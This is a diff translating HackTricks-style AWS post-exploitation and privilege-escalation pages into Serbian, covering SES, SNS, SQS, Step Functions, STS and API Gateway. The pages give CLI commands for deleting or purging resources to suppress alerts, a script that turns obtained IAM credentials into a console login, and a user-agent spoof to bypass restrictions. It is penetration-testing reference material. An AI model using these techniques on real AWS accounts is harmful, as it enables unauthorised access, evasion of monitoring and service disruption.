+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-ses-enum.md
@@ -12,76 +12,58 @@ For more information check:
 
 ### `ses:SendEmail`
 
-Send an email.
-
+Pošaljite email.
 ```bash
 aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json
 aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json
 ```
-
 Still to test.
 
 ### `ses:SendRawEmail`
 
-Send an email.
-
+Pošaljite email.
 ```bash
 aws ses send-raw-email --raw-message file://message.json
 ```
-
 Still to test.
 
 ### `ses:SendTemplatedEmail`
 
-Send an email based on a template.
-
+Pošaljite email na osnovu šablona.
 ```bash
 aws ses  send-templated-email --source  --destination  --template 
 ```
-
 Still to test.
 
 ### `ses:SendBulkTemplatedEmail`
 
-Send an email to multiple destinations
-
+Pošaljite email na više destinacija
 ```bash
 aws ses send-bulk-templated-email --source  --template 
 ```
-
 Still to test.
 
 ### `ses:SendBulkEmail`
 
-Send an email to multiple destinations.
-
+Pošaljite email na više odredišta.
 ```
 aws sesv2 send-bulk-email --default-content  --bulk-email-entries 
 ```
-
 ### `ses:SendBounce`
 
-Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email.
-
+Pošaljite **bounce email** preko primljenog emaila (ukazujući da email nije mogao biti primljen). Ovo se može uraditi **do 24h nakon prijema** emaila.
 ```bash
 aws ses send-bounce --original-message-id  --bounce-sender  --bounced-recipient-info-list 
 ```
-
 Still to test.
 
 ### `ses:SendCustomVerificationEmail`
 
-This will send a customized verification email. You might need permissions also to created the template email.
-
+Ovo će poslati prilagođeni verifikacioni email. Možda će vam biti potrebne dozvole i za kreiranje šablona emaila.
 ```bash
 aws ses send-custom-verification-email --email-address  --template-name 
 aws sesv2 send-custom-verification-email --email-address  --template-name 
 ```
-
 Still to test.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
index b24660ee1..5dd815d85 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SNS
 
-For more information:
+Za više informacija:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
@@ -12,73 +12,57 @@ For more information:
 
 ### Disrupt Messages
 
-In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected.
+U nekoliko slučajeva, SNS teme se koriste za slanje poruka platformama koje se prate (emailovi, slack poruke...). Ako napadač spreči slanje poruka koje upozoravaju na njegovo prisustvo u oblaku, mogao bi ostati neotkriven.
 
 ### `sns:DeleteTopic`
 
-An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic.
-
+Napadač bi mogao obrisati celu SNS temu, uzrokujući gubitak poruka i utičući na aplikacije koje se oslanjaju na temu.
 ```bash
 aws sns delete-topic --topic-arn 
 ```
-
-**Potential Impact**: Message loss and service disruption for applications using the deleted topic.
+**Potencijalni uticaj**: Gubitak poruka i prekid usluge za aplikacije koje koriste obrisanu temu.
 
 ### `sns:Publish`
 
-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+Napadač bi mogao poslati zlonamerne ili neželjene poruke na SNS temu, što bi moglo izazvati oštećenje podataka, pokrenuti nepredviđene radnje ili iscrpiti resurse.
 ```bash
 aws sns publish --topic-arn  --message 
 ```
-
-**Potential Impact**: Data corruption, unintended actions, or resource exhaustion.
+**Potencijalni uticaj**: Oštećenje podataka, nepredviđene radnje ili iscrpljivanje resursa.
 
 ### `sns:SetTopicAttributes`
 
-An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability.
-
+Napadač bi mogao da izmeni atribute SNS teme, što bi potencijalno moglo uticati na njene performanse, bezbednost ili dostupnost.
 ```bash
 aws sns set-topic-attributes --topic-arn  --attribute-name  --attribute-value 
 ```
-
-**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+**Potencijalni uticaj**: Loše konfiguracije koje dovode do smanjenja performansi, bezbednosnih problema ili smanjene dostupnosti.
 
 ### `sns:Subscribe` , `sns:Unsubscribe`
 
-An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
-
+Napadač bi mogao da se prijavi ili odjavi sa SNS teme, potencijalno stičući neovlašćen pristup porukama ili ometajući normalno funkcionisanje aplikacija koje se oslanjaju na tu temu.
 ```bash
 aws sns subscribe --topic-arn  --protocol  --endpoint 
 aws sns unsubscribe --subscription-arn 
 ```
-
-**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic.
+**Potencijalni uticaj**: Neovlašćen pristup porukama, prekid usluge za aplikacije koje se oslanjaju na pogođenu temu.
 
 ### `sns:AddPermission` , `sns:RemovePermission`
 
-An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic.
-
+Napadač bi mogao da dodeli neovlašćenim korisnicima ili servisima pristup SNS temi, ili da opozove dozvole za legitimne korisnike, uzrokujući prekide u normalnom funkcionisanju aplikacija koje se oslanjaju na temu.
 ```css
 aws sns add-permission --topic-arn  --label  --aws-account-id  --action-name 
 aws sns remove-permission --topic-arn  --label 
 ```
+**Potencijalni uticaj**: Neovlašćen pristup temi, izlaganje poruka ili manipulacija temom od strane neovlašćenih korisnika ili usluga, ometanje normalnog funkcionisanja aplikacija koje se oslanjaju na temu.
 
-**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
-
-### `sns:TagResource` , `sns:UntagResource`
-
-An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+### `sns:TagResource`, `sns:UntagResource`
 
+Napadač bi mogao dodati, izmeniti ili ukloniti oznake sa SNS resursa, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
 ```bash
 aws sns tag-resource --resource-arn  --tags Key=,Value=
 aws sns untag-resource --resource-arn  --tag-keys 
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potencijalni uticaj**: Poremećaj u alokaciji troškova, praćenju resursa i politikama kontrole pristupa zasnovanim na oznakama.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
index 872693e89..ff4d1880e 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SQS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
@@ -12,80 +12,62 @@ For more information check:
 
 ### `sqs:SendMessage` , `sqs:SendMessageBatch`
 
-An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+Napadač može poslati zlonamerne ili neželjene poruke u SQS red, što može dovesti do oštećenja podataka, pokretanja nepredviđenih akcija ili iscrpljivanja resursa.
 ```bash
 aws sqs send-message --queue-url  --message-body 
 aws sqs send-message-batch --queue-url  --entries 
 ```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potencijalni uticaj**: Iskorišćavanje ranjivosti, oštećenje podataka, nepredviđene radnje ili iscrpljivanje resursa.
 
 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
 
-An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
-
+Napadač bi mogao da primi, obriše ili izmeni vidljivost poruka u SQS redu, uzrokujući gubitak poruka, oštećenje podataka ili prekid usluge za aplikacije koje se oslanjaju na te poruke.
 ```bash
 aws sqs receive-message --queue-url 
 aws sqs delete-message --queue-url  --receipt-handle 
 aws sqs change-message-visibility --queue-url  --receipt-handle  --visibility-timeout 
 ```
-
-**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+**Potencijalni uticaj**: Ukrasti osetljive informacije, gubitak poruka, oštećenje podataka i prekid usluge za aplikacije koje se oslanjaju na pogođene poruke.
 
 ### `sqs:DeleteQueue`
 
-An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.
-
+Napadač bi mogao da obriše celu SQS red, uzrokujući gubitak poruka i utičući na aplikacije koje se oslanjaju na red.
 ```arduino
 Copy codeaws sqs delete-queue --queue-url 
 ```
-
-**Potential Impact**: Message loss and service disruption for applications using the deleted queue.
+**Potencijalni uticaj**: Gubitak poruka i prekid usluge za aplikacije koje koriste obrisanu red.
 
 ### `sqs:PurgeQueue`
 
-An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.
-
+Napadač bi mogao da očisti sve poruke iz SQS reda, što bi dovelo do gubitka poruka i potencijalnog prekida aplikacija koje se oslanjaju na te poruke.
 ```arduino
 Copy codeaws sqs purge-queue --queue-url 
 ```
-
-**Potential Impact**: Message loss and service disruption for applications relying on the purged messages.
+**Potencijalni uticaj**: Gubitak poruka i prekid usluge za aplikacije koje se oslanjaju na obrisane poruke.
 
 ### `sqs:SetQueueAttributes`
 
-An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability.
-
+Napadač bi mogao da izmeni atribute SQS reda, potencijalno utičući na njegovu performansu, bezbednost ili dostupnost.
 ```arduino
 aws sqs set-queue-attributes --queue-url  --attributes 
 ```
-
-**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+**Potencijalni uticaj**: Loše konfiguracije koje dovode do smanjenja performansi, bezbednosnih problema ili smanjene dostupnosti.
 
 ### `sqs:TagQueue` , `sqs:UntagQueue`
 
-An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+Napadač bi mogao da doda, izmeni ili ukloni oznake sa SQS resursa, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
 ```bash
 aws sqs tag-queue --queue-url  --tags Key=,Value=
 aws sqs untag-queue --queue-url  --tag-keys 
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potencijalni uticaj**: Poremećaj alokacije troškova, praćenja resursa i politika kontrole pristupa zasnovanih na oznakama.
 
 ### `sqs:RemovePermission`
 
-An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue.
-
+Napadač bi mogao da opozove dozvole za legitimne korisnike ili usluge uklanjanjem politika povezanih sa SQS redom. To bi moglo dovesti do poremećaja u normalnom funkcionisanju aplikacija koje se oslanjaju na red.
 ```arduino
 arduinoCopy codeaws sqs remove-permission --queue-url  --label 
 ```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions.
+**Potencijalni uticaj**: Poremećaj normalnog funkcionisanja aplikacija koje se oslanjaju na red zbog neovlašćenog uklanjanja dozvola.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
index 0d636f261..412a19146 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SSO & identitystore
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
@@ -12,8 +12,7 @@ For more information check:
 
 ### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment`
 
-These permissions can be used to disrupt permissions:
-
+Ove dozvole se mogu koristiti za ometanje dozvola:
 ```bash
 aws sso-admin delete-permission-set --instance-arn  --permission-set-arn 
 
@@ -21,9 +20,4 @@ aws sso-admin put-permissions-boundary-to-permission-set --instance-arn  --target-id  --target-type  --permission-set-arn  --principal-type  --principal-id 
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
index 6a0cd5ba9..7f4ad1a99 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## Step Functions
 
-For more information about this AWS service, check:
+Za više informacija o ovoj AWS usluzi, proverite:
 
 {{#ref}}
 ../aws-services/aws-stepfunctions-enum.md
@@ -12,20 +12,19 @@ For more information about this AWS service, check:
 
 ### `states:RevealSecrets`
 
-This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true.
+Ova dozvola omogućava **otkrivanje tajnih podataka unutar izvršenja**. Za to je potrebno postaviti nivo inspekcije na TRACE i parametar revealSecrets na true.
 
 

 
 ### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
 
-An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
+Napadač sa ovim dozvolama bi mogao trajno da obriše mašine stanja, njihove verzije i alias-e. To može ometati kritične radne tokove, dovesti do gubitka podataka i zahtevati značajno vreme za oporavak i vraćanje pogođenih mašina stanja. Pored toga, to bi omogućilo napadaču da prikrije tragove korišćene, ometa forenzičke istrage i potencijalno osakati operacije uklanjanjem bitnih automatizovanih procesa i konfiguracija stanja.
 
 > [!NOTE]
 >
-> - Deleting a state machine you also delete all its associated versions and aliases.
-> - Deleting a state machine alias you do not delete the state machine versions referecing this alias.
-> - It is not possible to delete a state machine version currently referenced by one o more aliases.
-
+> - Brisanjem mašine stanja takođe brišete sve njene povezane verzije i alias-e.
+> - Brisanjem alias-a mašine stanja ne brišete verzije mašine stanja koje se odnose na ovaj alias.
+> - Nije moguće obrisati verziju mašine stanja koja je trenutno referencirana od strane jednog ili više alias-a.
 ```bash
 # Delete state machine
 aws stepfunctions delete-state-machine --state-machine-arn 
@@ -34,45 +33,34 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn 
 ```
-
-- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
+- **Potencijalni Uticaj**: Poremećaj kritičnih radnih tokova, gubitak podataka i operativno zastoja.
 
 ### `states:UpdateMapRun`
 
-An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
-
+Napadač sa ovom dozvolom mogao bi da manipuliše konfiguracijom neuspeha Map Run-a i paralelnim podešavanjima, imajući mogućnost da poveća ili smanji maksimalan broj dozvoljenih izvršenja radnih tokova, što direktno utiče na performanse usluge. Pored toga, napadač bi mogao da manipuliše tolerisanim procentom neuspeha i brojem, imajući mogućnost da smanji ovu vrednost na 0, tako da svaki put kada stavka ne uspe, ceo map run bi neuspeo, što direktno utiče na izvršenje mašine stanja i potencijalno ometa kritične radne tokove.
 ```bash
 aws stepfunctions update-map-run --map-run-arn  [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ]
 ```
-
-- **Potential Impact**: Performance degradation, and disruption of critical workflows.
+- **Potencijalni uticaj**: Smanjenje performansi i prekid kritičnih radnih tokova.
 
 ### `states:StopExecution`
 
-An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
+Napadač sa ovom dozvolom mogao bi da zaustavi izvršenje bilo koje mašine stanja, ometajući tekuće radne tokove i procese. To bi moglo dovesti do nepotpunih transakcija, obustavljenih poslovnih operacija i potencijalne korupcije podataka.
 
 > [!WARNING]
-> This action is not supported by **express state machines**.
-
+> Ova akcija nije podržana od strane **express state machines**.
 ```bash
 aws stepfunctions stop-execution --execution-arn  [--error ] [--cause ]
 ```
-
-- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
+- **Potencijalni uticaj**: Poremećaj tekućih radnih tokova, operativno vreme zastoja i potencijalna korupcija podataka.
 
 ### `states:TagResource`, `states:UntagResource`
 
-An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+Napadač bi mogao da doda, izmeni ili ukloni oznake sa resursa Step Functions, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
 ```bash
 aws stepfunctions tag-resource --resource-arn  --tags Key=,Value=
 aws stepfunctions untag-resource --resource-arn  --tag-keys 
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potencijalni uticaj**: Poremećaj u alokaciji troškova, praćenju resursa i politikama kontrole pristupa zasnovanim na oznakama.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
index 3cabd1b71..b0ae1b5a1 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
@@ -4,21 +4,20 @@
 
 ## STS
 
-For more information:
+Za više informacija:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
-### From IAM Creds to Console
+### Od IAM kredencijala do konzole
 
-If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
-Note that the the user/role must have the permission **`sts:GetFederationToken`**.
+Ako ste uspeli da dobijete neke IAM kredencijale, možda ćete biti zainteresovani za **pristup web konzoli** koristeći sledeće alate.\
+Napomena: korisnik/rola mora imati dozvolu **`sts:GetFederationToken`**.
 
-#### Custom script
-
-The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
+#### Prilagođeni skript
 
+Sledeći skript će koristiti podrazumevani profil i podrazumevanu AWS lokaciju (ne gov i ne cn) da vam da potpisanu URL adresu koju možete koristiti za prijavu u web konzolu:
 ```bash
 # Get federated creds (you must indicate a policy or they won't have any perms)
 ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
@@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no
 output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
 
 if [ $? -ne 0 ]; then
-    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
-    exit $status
+echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
+exit $status
 fi
 
 # Parse the output
@@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation"
 
 # Make the HTTP request to get the sign-in token
 resp=$(curl -s "$federation_endpoint" \
-    --get \
-    --data-urlencode "Action=getSigninToken" \
-    --data-urlencode "SessionDuration=43200" \
-    --data-urlencode "Session=$json_creds"
+--get \
+--data-urlencode "Action=getSigninToken" \
+--data-urlencode "SessionDuration=43200" \
+--data-urlencode "Session=$json_creds"
 )
 signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
 
@@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
 # Give the URL to login
 echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
 ```
-
 #### aws_consoler
 
-You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
-
+Možete **generisati link za web konzolu** sa [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
 ```bash
 cd /tmp
 python3 -m venv env
@@ -67,27 +64,23 @@ source ./env/bin/activate
 pip install aws-consoler
 aws_consoler [params...] #This will generate a link to login into the console
 ```
-
 > [!WARNING]
-> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
+> Osigurajte da IAM korisnik ima `sts:GetFederationToken` dozvolu, ili obezbedite ulogu koju treba preuzeti.
 
 #### aws-vault
 
-[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
-
+[**aws-vault**](https://github.com/99designs/aws-vault) je alat za sigurno čuvanje i pristup AWS akreditivima u razvojnog okruženju.
 ```bash
 aws-vault list
 aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
 aws-vault login jonsmith # Open a browser logged as jonsmith
 ```
-
 > [!NOTE]
-> You can also use **aws-vault** to obtain an **browser console session**
+> Možete takođe koristiti **aws-vault** da dobijete **sesiju konzole pretraživača**
 
-### **Bypass User-Agent restrictions from Python**
-
-If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
+### **Obilaženje ograničenja User-Agent iz Pythona**
 
+Ako postoji **ograničenje za izvođenje određenih akcija na osnovu korisničkog agenta** koji se koristi (kao što je ograničavanje korišćenja python boto3 biblioteke na osnovu korisničkog agenta), moguće je koristiti prethodnu tehniku da **povežete se na web konzolu putem pretraživača**, ili možete direktno **modifikovati boto3 korisnički agent** tako što ćete uraditi:
 ```bash
 # Shared by ex16x41
 # Create a client
@@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda
 # Perform the action
 response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
index fe4f69e25..c23ad7fbd 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
@@ -4,14 +4,10 @@
 
 ## VPN
 
-For more information:
+Za više informacija:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
index ba8374b41..14923cfc2 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
@@ -1,27 +1,23 @@
-# AWS - Privilege Escalation
+# AWS - Eskalacija privilegija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## AWS Privilege Escalation
+## AWS Eskalacija privilegija
 
-The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization.
+Način da eskalirate svoje privilegije u AWS-u je da imate dovoljno dozvola da, na neki način, pristupite privilegijama drugih uloga/korisnika/grupa. Povezivanje eskalacija dok ne dobijete administratorski pristup organizaciji.
 
 > [!WARNING]
-> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
+> AWS ima **stotine** (ako ne i hiljade) **dozvola** koje entitet može dobiti. U ovoj knjizi možete pronaći **sve dozvole koje znam** koje možete zloupotrebiti da **eskalirate privilegije**, ali ako **znate neki put** koji ovde nije pomenut, **molim vas podelite**.
 
 > [!CAUTION]
-> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\
-> So remember that this is another way to **grant privileged permissions** to a principal.
+> Ako IAM politika ima `"Effect": "Allow"` i `"NotAction": "Someaction"` koja ukazuje na **resurs**... to znači da **dozvoljeni subjekt** ima **dozvolu da radi BILO ŠTA osim te specificirane akcije**.\
+> Zato zapamtite da je ovo još jedan način da **dodelite privilegovane dozvole** subjektu.
 
-**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.**
+**Stranice ovog odeljka su raspoređene po AWS usluzi. Tamo ćete moći da pronađete dozvole koje će vam omogućiti da eskalirate privilegije.**
 
-## Tools
+## Alati
 
 - [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py)
 - [Pacu](https://github.com/RhinoSecurityLabs/pacu)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
index 7f7edbc6e..b25bb28a6 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
@@ -4,7 +4,7 @@
 
 ## Apigateway
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-api-gateway-enum.md
@@ -12,44 +12,37 @@ For more information check:
 
 ### `apigateway:POST`
 
-With this permission you can generate API keys of the APIs configured (per region).
-
+Sa ovom dozvolom možete generisati API ključeve za API-jeve koji su konfigurisani (po regionu).
 ```bash
 aws --region  apigateway create-api-key
 ```
-
-**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
+**Potencijalni uticaj:** Ne možete privesc ovom tehnikom, ali možete dobiti pristup osetljivim informacijama.
 
 ### `apigateway:GET`
 
-With this permission you can get generated API keys of the APIs configured (per region).
-
+Sa ovom dozvolom možete dobiti generisane API ključeve API-ja koji su konfigurisani (po regionu).
 ```bash
 aws --region  apigateway get-api-keys
 aws --region  apigateway get-api-key --api-key  --include-value
 ```
-
-**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
+**Potencijalni Uticaj:** Ne možete privesc ovom tehnikom, ali možete dobiti pristup osetljivim informacijama.
 
 ### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`
 
-With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda).
-
+Sa ovim dozvolama moguće je modifikovati politiku resursa API-ja kako biste sebi omogućili pristup pozivanju i zloupotrebi potencijalnog pristupa koji API gateway može imati (kao što je pozivanje ranjivog lambda).
 ```bash
 aws apigateway update-rest-api \
-    --rest-api-id api-id \
-    --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'
+--rest-api-id api-id \
+--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'
 ```
-
-**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info.
+**Potencijalni Uticaj:** Obično nećete moći da privesc direktno ovom tehnikom, ali možete dobiti pristup osetljivim informacijama.
 
 ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`
 
-> [!NOTE]
-> Need testing
-
-An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**.
+> [!NAPOMENA]
+> Potrebno testiranje
 
+Napadač sa dozvolama `apigateway:PutIntegration`, `apigateway:CreateDeployment` i `iam:PassRole` može **dodati novu integraciju postojećem API Gateway REST API-ju sa Lambda funkcijom koja ima pridruženu IAM ulogu**. Napadač može zatim **pokrenuti Lambda funkciju da izvrši proizvoljan kod i potencijalno dobije pristup resursima povezanim sa IAM ulogom**.
 ```bash
 API_ID="your-api-id"
 RESOURCE_ID="your-resource-id"
@@ -63,16 +56,14 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Access to resources associated with the Lambda function's IAM role.
+**Potencijalni uticaj**: Pristup resursima povezanim sa IAM ulogom Lambda funkcije.
 
 ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`
 
-> [!NOTE]
-> Need testing
-
